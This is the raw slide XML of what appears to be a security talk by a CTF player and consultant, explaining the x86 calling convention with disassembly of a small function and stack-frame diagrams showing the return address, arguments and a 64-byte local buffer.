          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3704981" y="6911378"/>
              <a:ext cx="223967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0x80483fd</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="503" name="0xf8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4340663" y="6051216"/>
              <a:ext cx="96831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0xf8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="504" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4544148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505" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4544148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506" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3007311" y="8486178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7" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3007311" y="7647978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8" name="0xf0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6749288" y="7299919"/>
              <a:ext cx="96831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0xf0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="509" name="0x2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4404176" y="8587778"/>
              <a:ext cx="84128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0x2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="510" name="0x1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4404176" y="7749578"/>
              <a:ext cx="84128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0x1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="511" name="ebp/esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="5661619"/>
              <a:ext cx="173113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ebp/esp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="512" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1804069" y="59803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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23371741" y="56482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Rectangle 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9720922" y="4290526"/>
            <a:ext cx="4929457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72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Hawk1n5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Subtitle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7700195" y="5988344"/>
            <a:ext cx="8970910" cy="472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marL="304800" indent="-304800" defTabSz="1087636">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>CoreCloud Security Consultant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="304800" indent="-304800" defTabSz="1087636">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>CTF Player</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="304800" indent="-304800" defTabSz="1087636">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Reverse Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="304800" indent="-304800" defTabSz="1087636">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Binary Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="304800" indent="-304800" defTabSz="1087636">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Penetration Test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="304800" indent="-304800" defTabSz="1087636">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>Ruby &gt;&gt;&gt;&gt;&gt;&gt;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X86 Function Call"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="7792602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X86 Function Call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516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517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0x98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0x80483de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518" name="080483db &lt;f&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="11101609" cy="954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080483db &lt;f&gt;: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80483dc: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80483de:	83 ec 50             	sub    $0x50,%esp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80483e1:	8b 55 08             	mov    0x8(%ebp),%edx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80483ef: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80483f0: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080483f1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80483f4:	6a 02                	push   $0x2</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF26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80483f6:	6a 01                	push   $0x1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80483f8:	e8 de ff ff ff       	call   80483db &lt;f&gt;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2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>80483fd:	83 c4 08             	add    $0x8,%esp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8048406:	c3                   	ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="569" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15036800" y="3709710"/>
            <a:ext cx="6984657" cy="9613861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6984656" cy="9613859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="519" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3564769" y="2894962"/>
              <a:ext cx="2221907" cy="2221907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" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4005352" y="3435996"/>
              <a:ext cx="1749642" cy="1749642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1" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4557801" y="3912081"/>
              <a:ext cx="1243879" cy="1243879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2" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4894350" y="4434491"/>
              <a:ext cx="896470" cy="896470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3" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5447882" y="4833988"/>
              <a:ext cx="351650" cy="351650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4" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2148212" y="2598022"/>
              <a:ext cx="810957" cy="810957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5" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2971330" y="2586984"/>
              <a:ext cx="2587500" cy="2587500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6" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2529169" y="2614827"/>
              <a:ext cx="2531812" cy="2531813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7" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2163412" y="2597907"/>
              <a:ext cx="2442348" cy="2442348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Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2163413" y="2598021"/>
              <a:ext cx="2000589" cy="2000590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Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2163411" y="2598021"/>
              <a:ext cx="1569451" cy="1569450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Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2148212" y="2584014"/>
              <a:ext cx="1208395" cy="1208394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1" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2162509" y="2616811"/>
              <a:ext cx="407283" cy="407283"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="101600" cap="flat">
              <a:solidFill>
                <a:srgbClr val="00FD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2" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2158232" y="5114340"/>
              <a:ext cx="415839" cy="415839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3" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2218554" y="5131937"/>
              <a:ext cx="795118" cy="79511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4" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2678929" y="5115799"/>
              <a:ext cx="871020" cy="871020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5" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3226198" y="5115799"/>
              <a:ext cx="871020" cy="871020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6" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3737373" y="5115799"/>
              <a:ext cx="871020" cy="871020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7" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4240212" y="5114340"/>
              <a:ext cx="871020" cy="871020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8" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4668837" y="5115799"/>
              <a:ext cx="871020" cy="871020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9" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5085579" y="5237120"/>
              <a:ext cx="711747" cy="71174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0" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5443684" y="5583270"/>
              <a:ext cx="360046" cy="360045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1" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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2" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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3" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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5" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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6" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741" y="34442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7" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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8" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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9" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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0" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3387630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551" name="0x80483fd"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2853411" y="6911378"/>
              <a:ext cx="223967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0x80483fd</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="552" name="0xf8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3489094" y="6051216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0xf8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="553" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3692579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554" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3692579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555" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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6" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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7" name="0x2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3552606" y="85877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0x2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="558" name="0x1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3552606" y="77495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0x1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="559" name="ebp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="5582840"/>
              <a:ext cx="86695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</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="560" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="952500" y="59803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1" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2215085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562" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="952500" y="2612633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3" name="char buf[64]"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1944650" y="3341489"/>
              <a:ext cx="4128453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4D4E4D"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>char buf[64]</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="564" name="int tmp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2813434" y="4972109"/>
              <a:ext cx="2390885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4D4E4D"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>int tmp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="565" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5897719" y="594319"/>
              <a:ext cx="94286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566" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5897731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567" name="0xf0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5897719" y="72999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0xf0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="568" name="0x98"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5889097" y="2293864"/>
              <a:ext cx="109556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0x98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X86 Function Call"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="7792602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X86 Function Call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="572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0x98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0x80483ef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573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574" name="080483db &lt;f&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="11101609" cy="954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080483db &lt;f&gt;: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80483dc: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80483de:	83 ec 50             	sub    $0x50,%esp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80483e1:	8b 55 08             	mov    0x8(%ebp),%edx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rgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80483ef:	c9                   	leave </a:t>
            </a:r>
            <a:r>
              <a:t>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80483f0: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080483f1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80483f4:	6a 02                	push   $0x2</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF26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80483f6:	6a 01                	push   $0x1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80483f8:	e8 de ff ff ff       	call   80483db &lt;f&gt;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2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>80483fd:	83 c4 08             	add    $0x8,%esp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8048406:	c3                   	ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="601" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15036800" y="3709710"/>
            <a:ext cx="6984657" cy="9613861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6984656" cy="9613859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="575" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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6" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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7" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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8" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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9" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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0" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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1" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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2" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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3" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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4" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3387630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585" name="0x80483fd"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2853411" y="6911378"/>
              <a:ext cx="223967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0x80483fd</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="586" name="0xf8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3489094" y="6051216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0xf8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="587" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3692579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588" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3692579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589" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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0" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155741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1" name="0x2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3552606" y="85877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0x2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="592" name="0x1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3552606" y="77495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0x1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="593" name="ebp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="5582840"/>
              <a:ext cx="86695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</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="594" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="952500" y="59803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5" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2215085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596" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="952500" y="2612633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7" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5897719" y="594319"/>
              <a:ext cx="94286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598" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5897731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599" name="0xf0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5897719" y="72999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0xf0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="600" name="0x98"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5889097" y="2293864"/>
              <a:ext cx="109556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0x98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X86 Function Call"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="7792602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X86 Function Call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60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605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0xf8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0xec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0x80483f0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632" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15041751" y="3709710"/>
            <a:ext cx="6979706" cy="9613861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6979704" cy="9613859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="606" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12" y="644018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607" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="947548" y="6822458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8" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="215078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9" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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0" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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1" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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2" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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3" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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5" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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2150789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7" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3382678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618" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892767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619" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892779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620" name="0x80483fd"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2848460" y="6911378"/>
